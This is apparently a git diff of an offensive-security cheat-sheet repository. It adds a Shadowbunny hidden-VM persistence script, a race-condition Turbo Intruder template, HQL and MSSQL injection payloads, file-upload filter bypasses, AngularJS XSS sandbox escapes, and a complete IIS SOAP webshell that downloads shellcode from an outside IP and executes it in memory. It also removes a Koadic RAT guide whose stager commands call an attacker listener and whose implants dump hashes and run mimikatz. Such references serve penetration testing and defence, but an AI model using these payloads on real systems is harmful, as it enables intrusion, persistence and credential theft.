Files\Oracle\VirtualBox\VBoxManage.exe +# Disabling notifications +.\VBoxManage.exe setextradata global GUI/SuppressMessages "all" + +# Download the Virtual machine disk +Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd + +# Create a new VM +$vmname = "IT Recovery" +.\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register + +# Add a network card in NAT mode +.\VBoxManage.exe modifyvm $vmname --ioapic on # required for 64bit +.\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128 +.\VBoxManage.exe modifyvm $vmname --nic1 nat +.\VBoxManage.exe modifyvm $vmname --audio none +.\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga +.\VBoxManage.exe modifyvm $vmname --description "Shadowbunny" + +# Mount the VHD file +.\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata +.\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0 + +# Start the VM +.\VBoxManage.exe startvm $vmname –type headless + + +# optional - adding a shared folder +# require: VirtualBox Guest Additions +.\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount +# then mount the folder in the VM +sudo mkdir /mnt/c +sudo mount -t vboxsf shadow_c /mnt/c +``` + + ## Domain ### User Certificate @@ -454,3 +552,4 @@ kerberos::tgt * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/) +* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Post Exploitation Koadic.md b/Methodology and Resources/Windows - Post Exploitation Koadic.md deleted file mode 100644 index 9caea726..00000000 --- a/Methodology and Resources/Windows - Post Exploitation Koadic.md +++ /dev/null @@ -1,123 +0,0 @@ -# Koadic C3 COM Command & Control - JScript RAT - -> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. - -## Installation - -```powershell -git clone https://github.com/zerosum0x0/koadic -git submodule init -git submodule update -pip2.7 install -r requirements.txt --user -python2.7 koadic -``` - -## Set a listener - -```powershell -use stager/js/mshta -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] mshta http://192.168.1.19:4444/6DX7f -``` - -```powershell -use stager/js/wmic -set LHOST 192.168.1.19 -set SRVPORT 4444 -run - -[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl" -``` - -### Stagers - -Stagers hook target zombies and allow you to use implants. - -Module | Description ---------|------------ -stager/js/mshta | serves payloads using MSHTA.exe HTML Applications -stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets -stager/js/wmic | serves payloads using WMIC XSL -stager/js/rundll32_js | serves payloads using rundll32.exe -stager/js/disk | serves payloads using files on disk - - - -## List zombies and interact with them - -```powershell -(koadic: sta/js/wmic)$ zombies - - ID IP STATUS LAST SEEN - --- --------- ------- ------------ - 0 192.168.1.30 Alive 2018-10-04 17:07:12 - -(koadic: sta/js/wmic)$ zombies 0 - ID: 0 - Status: Alive - First Seen: 2018-10-04 17:05:00 - Last Seen: 2018-10-04 17:14:42 - IP: 192.168.1.30 - User: DESKTOP-68URA9U\CrashWin - [...] - Elevated: No - [...] -``` - -Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`. - -```powershell -[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami -[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created. -[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed. -Result for `cd C:\Users\CrashWin & whoami`: -desktop-68ura9u\crashwin -``` - -## Use an implant - -Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`. - -```powershell -(koadic: sta/js/mshta)$ use implant/phish/password_box -(koadic: imp/phi/password_box)$ set ZOMBIE 1 -(koadic: imp/phi/password_box)$ run -Input contents: -MyStrongPassword123! -``` - -### Implants - -Implants start jobs on zombies. - -Module | Description ---------|------------ -implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. -implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10. -implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. -implant/fun/voice | Plays a message over text-to-speech. -implant/gather/clipboard | Retrieves the current content of the user clipboard. -implant/gather/enum_domain_info | Retrieve information about the Windows domain. -implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. -implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. -implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X). -implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). -implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). -implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). -implant/manage/enable_rdesktop | Enables remote desktop on the target. -implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. -implant/phishing/password_box | Prompt a user to enter their password. -implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. -implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. -implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. -implant/utils/download_file | Downloads a file from the target zombie. -implant/utils/multi_module | Run a number of implants in succession. -implant/utils/upload_file | Uploads a file from the listening server to the target zombies. - -## References - -- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) -- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 8743b0fc..7aa2995b 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -14,6 +14,7 @@ * [Default Writeable Folders](#default-writeable-folders) * [EoP - Looting for passwords](#eop---looting-for-passwords) * [SAM and SYSTEM files](#sam-and-system-files) + * [LAPS Settings](#laps-settings) * [HiveNightmare](#hivenightmare) * [Search for file contents](#search-for-file-contents) * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) @@ -394,6 +395,15 @@ samdump2 SYSTEM SAM -o sam.txt Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash. +### LAPS Settings + +Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry. + +* LAPS Enabled: AdmPwdEnabled +* LAPS Admin Account Name: AdminAccountName +* LAPS Password Complexity: PasswordComplexity +* LAPS Password Length: PasswordLength +* LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled ### HiveNightmare diff --git a/Race Condition/README.md b/Race Condition/README.md index 2e70df87..1986c47e 100644 --- a/Race Condition/README.md +++ b/Race Condition/README.md @@ -41,9 +41,40 @@ 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder 4. Click "Attack" +## Turbo Intruder 2 Requests Examples +This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds. +```python +def queueRequests(target, wordlists): + engine = RequestEngine(endpoint=target.endpoint, + concurrentConnections=30, + requestsPerConnection=100, + pipeline=False + ) + request1 = ''' +POST /target-URI-1 HTTP/1.1 +Host: +Cookie: session= + +parameterName=parameterValue + ''' + + request2 = ''' +GET /target-URI-2 HTTP/1.1 +Host: +Cookie: session= + ''' + + engine.queue(request1, gate='race1') + for i in range(30): + engine.queue(request2, gate='race1') + engine.openGate('race1') + engine.complete(timeout=60) +def handleResponse(req, interesting): + table.add(req) +``` ## References * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247) * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack) -* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) \ No newline at end of file +* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e) diff --git a/SQL Injection/HQL Injection.md b/SQL Injection/HQL Injection.md index 6e8168be..97d36723 100644 --- a/SQL Injection/HQL Injection.md +++ b/SQL Injection/HQL Injection.md @@ -1,11 +1,18 @@ # Hibernate Query Language Injection > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia + ## Summary * [HQL Comments](#hql-comments) * [HQL List Columns](#hql-list-columns) * [HQL Error Based](#hql-error-based) +* [Single Quote Escaping](#single-quote-escaping) +* [$-quoted strings](#--quoted-strings) +* [DBMS Magic functions](#dbms-magic-functions) +* [Unicode](#unicode) +* [Java constants](#java-constants) +* [Methods by DBMS](#methods-by-dbms) * [References](#references) ## HQL Comments @@ -49,10 +56,107 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro :warning: **HQL does not support UNION queries** +## Single Quote Escaping + +Method works for MySQL DBMS which escapes SINGLE QUOTES in strings with SLASH `\'`. + +In HQL SINGLE QUOTES is escaped in strings by doubling `''`. + +``` +'abc\''or 1=(select 1)--' +``` + +In HQL it is a string, in MySQL it is a string and additional SQL expression. + +## $-quoted strings + +Method works for DBMS which allow DOLLAR-QUOTED strings in SQL expressions: PostgreSQL, H2. + +Hibernate ORM allows identifiers starting with `$$`. + +``` +$$='$$=concat(chr(61),chr(39)) and 1=1--' +``` + +## DBMS Magic functions + +Method works for DBMS which have MAGIC FUNCTIONS which evaluate SQL expression in string parameter: PostgreSQL, Oracle. + +Hibernate allows to specify any function name in HQL expression. + +PostgreSQL has built-in function `query_to_xml('Arbitrary SQL')`. + +``` +array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1) +``` + +Oracle has built-in function `DBMS_XMLGEN.getxml('SQL')` + +``` +NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1' +``` + +## Unicode + +Method works for DBMS which allow UNICODE delimiters (Ex. U+00A0) between SQL tokens: Microsoft SQL Server, H2. + +In Microsoft SQL SERVER `SELECT LEN([U+00A0](select[U+00A0](1))` works the same as `SELECT LEN((SELECT(1)))`; + +HQL allows UNICODE symbols in identifiers (function or parameter names). + +``` +SELECT p FROM hqli.persistent.Post p where p.name='dummy' or 1CHAR(41) and (select count(1) from sysibm.sysdummy1)>0 --')=1 and '1'='1 +``` + +## Methods by DBMS + +![image](https://user-images.githubusercontent.com/16578570/163428666-a22105a8-287c-4997-8aef-8f372a1b86e9.png) + ## References * [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html) * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language) * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf) * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm) +* [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf) * [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/) diff --git a/SQL Injection/MSSQL Injection.md b/SQL Injection/MSSQL Injection.md index 1ee72f97..ce645d4b 100644 --- a/SQL Injection/MSSQL Injection.md +++ b/SQL Injection/MSSQL Injection.md @@ -23,6 +23,7 @@ * [MSSQL UNC path](#mssql-unc-path) * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin) * [MSSQL Trusted Links](#mssql-trusted-links) +* [MSSQL List permissions](#mssql-list-permissions) ## MSSQL Comments @@ -96,7 +97,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee MSSQL 2005 SELECT name, password_hash FROM master.sys.sql_logins -SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins +SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins ``` ## MSSQL Union Based @@ -297,6 +298,33 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" ``` +## List permissions + +Listing effective permissions of current user on the server. + +```sql +SELECT * FROM fn_my_permissions(NULL, 'SERVER'); +``` + +Listing effective permissions of current user on the database. + +```sql +SELECT * FROM fn_my_permissions (NULL, 'DATABASE'); +``` + +Listing effective permissions of current user on a view. + +``` +SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name; +``` + +Check if current user is a member of the specified server role. + +```sql +-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin +SELECT is_srvrolemember('sysadmin'); +``` + ## References * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet) @@ -306,3 +334,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT * [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT) * [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e) * [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975) +* [Microsoft - sys.fn_my_permissions (Transact-SQL)](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15) +* [Microsoft - IS_SRVROLEMEMBER (Transact-SQL)](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15) diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index ed8dd5ca..a16cb7d8 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -223,6 +223,12 @@ List: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ ``` +### Bypass using unicode + +In some languages (.NET, Python 3) regex supports unicode by default. +`\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`. + + ### Bypass filter_var() php function ```powershell diff --git a/Upload Insecure Files/Extension ASP/shell.soap b/Upload Insecure Files/Extension ASP/shell.soap new file mode 100644 index 00000000..dcac007d --- /dev/null +++ b/Upload Insecure Files/Extension ASP/shell.soap @@ -0,0 +1,55 @@ +<%@ WebService Language="C#" class="SoapStager"%> +using System; +using System.IO; +using System.Web; +using System.Web.Services; +using System.Net; +using System.Net.NetworkInformation; +using System.Net.Security; + +// SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap +// https://github.com/0xbad53c/webshells/tree/main/iis + +[WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")] +[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)] +public class SoapStager : MarshalByRefObject +{ + private static Int32 MEM_COMMIT=0x1000; + private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect); + + [System.Runtime.InteropServices.DllImport("kernel32")] + private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId); + + + [System.ComponentModel.ToolboxItem(false)] + [WebMethod] + public string loadStage() + { + string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode + byte[] rzjUFlLZh; + + IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy; + defaultWebProxy.Credentials = CredentialCache.DefaultCredentials; + + // in case of HTTPS + using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy }) + { + ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; + ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; }); + webClient.UseDefaultCredentials = true; + rzjUFlLZh = webClient.DownloadData(Url); + } + + + // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion + IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); + System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length); + IntPtr owlqRoQI_ms = IntPtr.Zero; + IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms); + + return "finished"; + } +} \ No newline at end of file diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index e5593850..0ccaea3f 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -1,13 +1,12 @@ # Upload -Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. ## Summary * [Tools](#tools) * [Exploits](#exploits) - * [Defaults extensions](#defaults-extension) - * [Other extensions](#other-extensions) + * [Defaults extensions](#defaults-extensions) * [Upload tricks](#upload-tricks) * [Filename vulnerabilities](#filename-vulnerabilities) * [Picture upload with LFI](#picture-upload-with-lfi) @@ -44,7 +43,7 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at .phtm .inc ``` -* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)` +* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap` * JSP : `.jsp, .jspx, .jsw, .jsv, .jspf` * Perl: `.pl, .pm, .cgi, .lib` * Coldfusion: `.cfm, .cfml, .cfc, .dbm` @@ -53,18 +52,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at - Use double extensions : `.jpg.php` - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` -- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr` +- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr` - Null byte (works well against `pathinfo()`) - * .php%00.gif - * .php\x00.gif - * .php%00.png - * .php\x00.png - * .php%00.jpg - * .php\x00.jpg + * `.php%00.gif` + * `.php\x00.gif` + * `.php%00.png` + * `.php\x00.png` + * `.php%00.jpg` + * `.php\x00.jpg` - Special characters * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed. - * Whitespace characters: `file.php%20` + * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg` * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. + * Slash: `file.php/`, `file.php.\` - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` * `Content-Type : image/gif` * `Content-Type : image/png` @@ -143,4 +143,5 @@ When a ZIP/archive file is automatically decompressed after the upload * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) * [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) -* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) \ No newline at end of file +* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) +* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) \ No newline at end of file diff --git a/XSS Injection/README.md b/XSS Injection/README.md index f17abf32..8309a2dd 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -663,6 +663,12 @@ You can bypass a single quote with ' in an on mousedown event handler Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777` http://www.geektools.com/cgi-bin/ipconv.cgi +```javascript + +window["doc"+"ument"] ``` ### Bypass using javascript inside a string @@ -1248,3 +1255,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056) - [Bypass < with <](https://hackerone.com/reports/639684) +- [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code) diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md index 5a2be103..629699be 100644 --- a/XSS Injection/XSS in Angular.md +++ b/XSS Injection/XSS in Angular.md @@ -157,6 +157,23 @@ AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}} ``` +AngularJS (without `'` single and `"` double quotes and `constructor` string) + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` + +```javascript +{{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}} +``` ### Blind XSS